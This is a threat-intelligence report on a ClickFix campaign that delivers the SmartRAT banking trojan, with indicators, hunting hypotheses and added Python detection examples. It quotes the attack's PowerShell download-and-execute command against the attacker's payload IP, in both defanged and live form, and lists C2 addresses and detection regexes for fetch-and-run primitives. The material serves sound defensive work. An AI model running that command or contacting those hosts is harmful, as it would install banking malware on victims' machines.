AI Generated ClickFix Attack Delivers SmartRAT | ThreatLabz
ThreatLabz identified a ClickFix campaign that uses AI-generated typosquatting domains to impersonate Brazilian banks and deliver a PowerShell-based banking RAT dubbed SmartRAT. The malware establishes persistence through a scheduled task, a registry Run key, or a Windows service, communicates over a custom TCP protocol on port 51888, and supports keylogging, fake banking overlays, and QR code interception for financial fraud.
- Domain: cartaobb[.]com. Typosquatting domain impersonating a Brazilian bank, used to host the ClickFix lure.
- Domain: c[.]windowsupdate-cdn[.]com. Primary command and control (C2) domain for SmartRAT.
- IP: 162[.]141[.]111[.]227. Fallback C2 IP address for SmartRAT.
- IP: 64[.]95[.]13[.]238. Payload delivery IP hosting the initial st.txt dropper and the secondary payload.php.
- URL: hxxp://64[.]95[.]13[.]238/payload[.]php. Hosts the secondary encrypted SmartRAT payload.
- URL: hxxp://64[.]95[.]13[.]238/st[.]txt. Hosts the initial PowerShell dropper script.
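To make the indicators above usable against your own telemetry, here is an added Python example written for this page (it is not code from ThreatLabz or from the campaign). It refangs the defanged entries and sweeps a constructed proxy-log sample for them. The log lines, timestamps and client addresses are made up for the example, the log format (timestamp, client, host, method, path) is an assumed one, and treating any host beneath a listed domain as a hit is the example's own matching policy, not something the report states.

```python
import ipaddress
import re
from typing import Callable, Dict, List, Tuple

# The published indicators, copied as defanged from the list above.
IOCS: Dict[str, List[str]] = {
    "domain": ["cartaobb[.]com", "c[.]windowsupdate-cdn[.]com"],
    "ip": ["162[.]141[.]111[.]227", "64[.]95[.]13[.]238"],
    "url": ["hxxp://64[.]95[.]13[.]238/payload[.]php", "hxxp://64[.]95[.]13[.]238/st[.]txt"],
}

# Constructed proxy-log sample (timestamp, client, host, method, path). The
# entries, clients and timestamps are made up for this example; the scheme is
# assumed to be plain HTTP, which is how the report's payload URLs are served.
SAMPLE_PROXY_LOG = """\
2025-01-15T13:01:02Z 10.0.0.5 cartaobb.com GET /
2025-01-15T13:01:09Z 10.0.0.5 64.95.13.238 GET /st.txt
2025-01-15T13:01:10Z 10.0.0.5 64.95.13.238 GET /payload.php
2025-01-15T13:02:00Z 10.0.0.7 update.microsoft.com GET /v1/status
2025-01-15T13:02:30Z 10.0.0.9 cartaobb.com.br GET /login
2025-01-15T13:03:00Z 10.0.0.5 c.windowsupdate-cdn.com GET /
"""


def refang(value: str) -> str:
    """Convert a defanged indicator ('[.]', 'hxxp') back into its live form."""
    value = value.strip().replace("[.]", ".").replace("(.)", ".")
    value = re.sub(r"^hxxp", "http", value, flags=re.I)
    return value.lower()


def domain_matches(host: str, ioc_domain: str) -> bool:
    """True for the listed domain itself or any host beneath it. A look-alike
    such as cartaobb.com.br only shares a prefix and must not match."""
    return host == ioc_domain or host.endswith("." + ioc_domain)


def build_matcher(iocs: Dict[str, List[str]]) -> Callable[[Dict[str, str]], List[Tuple[str, str]]]:
    """Pre-compute refanged indicators and return a per-record matcher."""
    domains = [refang(d) for d in iocs["domain"]]
    ips = {ipaddress.ip_address(refang(i)) for i in iocs["ip"]}
    urls = {refang(u) for u in iocs["url"]}

    def match(record: Dict[str, str]) -> List[Tuple[str, str]]:
        hits: List[Tuple[str, str]] = []
        host = record["host"].lower()
        try:
            if ipaddress.ip_address(host) in ips:
                hits.append(("ip", host))
        except ValueError:  # not an IP literal, so compare as a hostname
            hits.extend(("domain", d) for d in domains if domain_matches(host, d))
        url = record["url"].lower()
        if url in urls:
            hits.append(("url", url))
        return hits

    return match


def parse_proxy_line(line: str) -> Dict[str, str]:
    """Parse one line of the assumed log format into a record with a full URL."""
    ts, client, host, method, path = line.split()
    return {"ts": ts, "client": client, "host": host, "method": method,
            "url": f"http://{host}{path}"}


def scan_log(text: str, iocs: Dict[str, List[str]] = IOCS) -> List[Tuple[str, str, List[Tuple[str, str]]]]:
    """Return (client, host, hits) for every log line that touches a known indicator."""
    match = build_matcher(iocs)
    results = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_proxy_line(line)
        hits = match(rec)
        if hits:
            results.append((rec["client"], rec["host"], hits))
    return results


if __name__ == "__main__":
    for client, host, hits in scan_log(SAMPLE_PROXY_LOG):
        print(f"{client} -> {host}: {hits}")
```

Run as a script, it prints one line per matching request; the two requests to 64.95.13.238 produce both an IP hit and a URL hit, and the look-alike cartaobb.com.br line produces nothing, which is the behaviour you want when a block list is built from these indicators.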
What Happened
Cybercriminals are using AI tools to create fake websites that look like popular Brazilian banks. These sites use a trick called 'ClickFix'—showing a fake security check and then a fake error screen—to convince visitors to copy and paste a malicious command into their computer. If executed, this command installs a hidden program called SmartRAT, which allows the attackers to steal passwords, monitor the screen, and intercept banking QR codes. Users should be extremely cautious about copying and pasting commands from websites, and organizations should ensure their security tools can detect unusual PowerShell activity.
Key Takeaways
- Threat actors are using AI-generated websites to impersonate Brazilian banks and deploy a ClickFix lure.
- The ClickFix lure tricks victims into executing a PowerShell command that downloads SmartRAT.
- SmartRAT is a PowerShell-based banking RAT capable of remote access, keylogging, fake banking overlays, and QR code interception.
- SmartRAT establishes persistence via scheduled tasks, registry keys, or a Windows service named MicrosoftEdgeUpdateCore.
- The C2 panel for SmartRAT contains a critical authentication flaw allowing bypass via client-side localStorage manipulation.
Affected Systems
- Windows operating systems
- Users of Brazilian financial institutions
Attack Chain
The attack begins when a victim visits a typosquatted domain impersonating a Brazilian bank. A fake CAPTCHA and subsequent fake BSOD trick the user into copying and executing a malicious PowerShell command via the Run dialog. This command downloads a dropper script (st.txt) which in turn fetches and decrypts the main SmartRAT payload (payload.php). SmartRAT establishes persistence via a scheduled task, registry key, or Windows service, and begins communicating with its C2 server to enable remote control, keylogging, and banking overlays.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide specific detection rules, but details behavioral indicators and IOCs that can be used to build custom detections.
Detection Engineering Assessment
- EDR Visibility: High. EDR solutions with PowerShell script block logging, process creation monitoring (especially csc.exe spawned by PowerShell), and network connection tracking can readily detect the execution chain and C2 communications.
- Network Visibility: Medium. C2 traffic is encrypted over a raw TCP socket on port 51888, but the initial payload downloads are plain HTTP, and the non-standard C2 port can be flagged.
- Detection Difficulty: Moderate. ClickFix relies on user interaction and so bypasses some automated email and web filters, but the heavy reliance on PowerShell, inline C# compilation, and fixed file paths makes post-execution detection straightforward with proper logging.
Required Log Sources
- PowerShell Script Block Logging (Event ID 4104)
- Process Creation (Event ID 4688 / Sysmon Event ID 1)
- Network Connections (Sysmon Event ID 3)
- Scheduled Task Creation (Event ID 4698)
- Service Creation (Event ID 7045)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for PowerShell processes executing hidden windows and downloading files to public or temporary directories. | Process Creation, PowerShell Script Block Logging | Execution | Low |
| Search for the creation of scheduled tasks or Windows services named 'MicrosoftEdgeUpdateCore', especially if the binary path points to the ETW diagnostic folder. | Scheduled Task Creation, Service Creation | Persistence | Low |
| Monitor for PowerShell processes spawning csc.exe to compile inline C# code, which is highly anomalous for standard user activity. | Process Creation | Privilege Escalation | Low |
| Investigate outbound network connections over TCP port 51888, particularly from PowerShell processes. | Network Connections | Command and Control | Low |
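The four hypotheses above can be written directly as detection logic. The following added Python example (written for this page, not code from the report or the malware) runs them over constructed Sysmon/Security-log style event records. Field names follow Sysmon and Windows event conventions, the sample events, paths and addresses are synthetic, and the benign edgeupdate service entry is included to show that the name check does not fire on Microsoft's real Edge updater. The ATT&CK stage labels are the ones used in the table.

```python
import re
from typing import Callable, Dict, List, Optional

# Constructed, Sysmon/Security-log style records written for this example.
# They are synthetic, not telemetry from the campaign described above.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # 0: benign admin PowerShell, must not alert
    {"EventID": "1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe Get-Service | Out-File C:\Users\alice\services.txt"},
    # 1: ClickFix stage, download-and-execute cradle typed into the Run dialog
    {"EventID": "1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell \"$k8='http://64.95.13.238/st.txt';iex(irm $k8)\""},
    # 2: script block (4104) hiding the console via user32!ShowWindow and staging a file
    {"EventID": "4104",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ScriptBlockText": r'[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr h,int c);'
                        r' Set-Content C:\Users\Public\Documents\msedge.txt $body'},
    # 3: inline C# compilation, csc.exe spawned by PowerShell
    {"EventID": "1",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"csc.exe /noconfig /fullpaths @C:\Users\alice\AppData\Local\Temp\q1w2e3.cmdline"},
    # 4: service installed (7045) under the ETW diagnostic folder
    {"EventID": "7045", "ServiceName": "MicrosoftEdgeUpdateCore",
     "ImagePath": r"C:\ProgramData\Microsoft\Diagnosis\ETW\MicrosoftEdgeUpdateCore.exe"},
    # 5: Microsoft's real Edge updater service, must not alert
    {"EventID": "7045", "ServiceName": "edgeupdate",
     "ImagePath": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"},
    # 6: PowerShell connecting to the C2 port
    {"EventID": "3",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "162.141.111.227", "DestinationPort": "51888"},
    # 7: browser HTTPS, must not alert
    {"EventID": "3", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": "443"},
    # 8: scheduled task (4698) named like the malware's persistence artifact
    {"EventID": "4698", "TaskName": r"\MicrosoftEdgeUpdateCore",
     "TaskContent": r"<Exec><Command>powershell.exe</Command><Arguments>-File "
                    r"C:\Users\alice\AppData\Roaming\Microsoft\Diagnosis\ETW\msedgeupdate.txt</Arguments></Exec>"},
]

# Patterns are raw strings so the backslashes reach the regex engine intact.
DOWNLOAD_CRADLE = re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadFile)\b", re.I)
EXEC_CRADLE = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)
STAGING_DIR = re.compile(r"\\Users\\Public\\|\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
HIDE_WINDOW = re.compile(r"user32\.dll.*?ShowWindow|-w(?:indowstyle)?\s+hidden", re.I | re.S)
ETW_DIR = re.compile(r"\\Microsoft\\Diagnosis\\ETW\\", re.I)
PERSIST_NAME = re.compile(r"MicrosoftEdgeUpdateCore", re.I)
C2_PORT = "51888"


def is_powershell(path: str) -> bool:
    return path.lower().endswith(("powershell.exe", "pwsh.exe"))


def hunt_hidden_download(ev: Dict[str, str]) -> Optional[str]:
    """Hypothesis 1: PowerShell downloading, or hiding its window while staging files."""
    if not is_powershell(ev.get("Image", "")):
        return None
    text = ev.get("CommandLine", "") + " " + ev.get("ScriptBlockText", "")
    if DOWNLOAD_CRADLE.search(text) and EXEC_CRADLE.search(text):
        return "powershell download-and-execute cradle"
    if HIDE_WINDOW.search(text) and (DOWNLOAD_CRADLE.search(text) or STAGING_DIR.search(text)):
        return "hidden-window powershell writing to a staging directory"
    return None


def hunt_persistence(ev: Dict[str, str]) -> Optional[str]:
    """Hypothesis 2: task or service named MicrosoftEdgeUpdateCore, or run from the ETW folder."""
    if ev["EventID"] == "7045":
        name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
    elif ev["EventID"] == "4698":
        name, path = ev.get("TaskName", ""), ev.get("TaskContent", "")
    else:
        return None
    if PERSIST_NAME.search(name) or ETW_DIR.search(path):
        return f"suspicious persistence artifact {name!r}"
    return None


def hunt_inline_compile(ev: Dict[str, str]) -> Optional[str]:
    """Hypothesis 3: csc.exe whose parent is PowerShell (inline C# compilation)."""
    if ev["EventID"] == "1" and ev["Image"].lower().endswith("csc.exe") and is_powershell(ev.get("ParentImage", "")):
        return "csc.exe spawned by powershell (inline C# compilation)"
    return None


def hunt_c2_port(ev: Dict[str, str]) -> Optional[str]:
    """Hypothesis 4: outbound connection to tcp/51888, worse when the client is PowerShell."""
    if ev["EventID"] == "3" and ev.get("DestinationPort") == C2_PORT:
        who = "powershell" if is_powershell(ev["Image"]) else "non-powershell"
        return f"outbound tcp/{C2_PORT} from {who} process to {ev['DestinationIp']}"
    return None


HUNTS: Dict[str, Callable[[Dict[str, str]], Optional[str]]] = {
    "Execution": hunt_hidden_download,
    "Persistence": hunt_persistence,
    "Privilege Escalation": hunt_inline_compile,
    "Command and Control": hunt_c2_port,
}


def run_hunts(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply every hunt to every event; return one alert per (event, hunt) match."""
    alerts: List[Dict[str, object]] = []
    for i, ev in enumerate(events):
        for stage, hunt in HUNTS.items():
            reason = hunt(ev)
            if reason:
                alerts.append({"event_index": i, "stage": stage, "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in run_hunts(SAMPLE_EVENTS):
        print(f"[{alert['stage']}] event {alert['event_index']}: {alert['reason']}")
```

The persistence check fires on either the artifact name or the ETW path, so a renamed task that still runs from the Diagnosis\ETW folder is caught, while the real edgeupdate service (different name, different path) stays quiet. The download-cradle rule requires both a fetch and an execute primitive in the same command line or script block, which keeps ordinary Invoke-WebRequest use by administrators out of the alert queue.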
Control Gaps
- Lack of PowerShell execution restrictions for standard users
- Insufficient web filtering for newly registered typosquatting domains
- Missing endpoint controls to prevent users from executing commands from the clipboard
Key Behavioral Indicators
- PowerShell execution with hidden window flags (ShowWindow)
- Creation of files in %APPDATA%\Microsoft\Diagnosis\ETW\
- Network connections to port 51888
- Inline C# compilation via csc.exe spawned by PowerShell
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Consider blocking the identified C2 IPs and domains at the network perimeter.
- Evaluate whether to search endpoint telemetry for the presence of 'MicrosoftEdgeUpdateCore' scheduled tasks or services.
Infrastructure Hardening
- Consider restricting PowerShell execution policies and enabling Constrained Language Mode where feasible.
- Evaluate implementing network segmentation to restrict outbound traffic on non-standard ports like 51888.
- If supported by your tooling, consider blocking newly registered and look-alike domains that impersonate financial institutions, since the campaign's lure sites are AI-generated typosquats.
User Protection
- Consider deploying EDR rules to detect and block PowerShell processes spawning csc.exe.
- Evaluate whether to enforce UAC prompts for all users and monitor for anomalous elevation requests.
Security Awareness
- Consider updating security awareness training to educate users on the 'ClickFix' technique, emphasizing the dangers of copying and pasting commands from web pages.
- Evaluate whether to train users to recognize fake CAPTCHA and BSOD screens.
MITRE ATT&CK Mapping
- T1566 - Phishing
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- T1569.002 - Service Execution
- T1543.003 - Create or Modify System Process: Windows Service
- T1036 - Masquerading
- T1070.004 - Indicator Removal: File Deletion
- T1082 - System Information Discovery
- T1071 - Application Layer Protocol (HTTP retrieval of st.txt and payload.php)
- T1095 - Non-Application Layer Protocol (custom TCP C2 protocol on port 51888)
Additional IOCs
- Registry Keys:
  - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdateCore: registry Run key used by SmartRAT for persistence.
- File Paths:
  - C:\Users\Public\Documents\msedge.txt: decoy text file used to store the downloaded payload.php.
  - %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt: file path where SmartRAT copies itself for persistence.
  - %APPDATA%\Microsoft\Diagnosis\ETW\client_debug.log: debug log file created by SmartRAT.
  - C:\ProgramData\Microsoft\Diagnosis\ETW\process_<PID>.log: per-process log file created by SmartRAT to record activity.
  - %ProgramData%\Microsoft\Diagnosis\ETW\MicrosoftEdgeUpdateCore.exe: compiled C# Windows service executable used by SmartRAT for privilege escalation and persistence.
- Command Lines:
  - Purpose: initial ClickFix execution to download and run the dropper. Tools: powershell.exe. Stage: Initial Access.
    powershell "$k8='http://64[.]95[.]13[.]238/st.txt';iex(irm $k8)"
  - Purpose: hide the console window and download the secondary payload. Tools: powershell.exe. Stage: Execution.
    [DllImport("user32.dll")]public static extern bool ShowWindow
  - Purpose: compile inline C# code to install a Windows service. Tools: csc.exe, powershell.exe. Stage: Privilege Escalation.
    csc.exe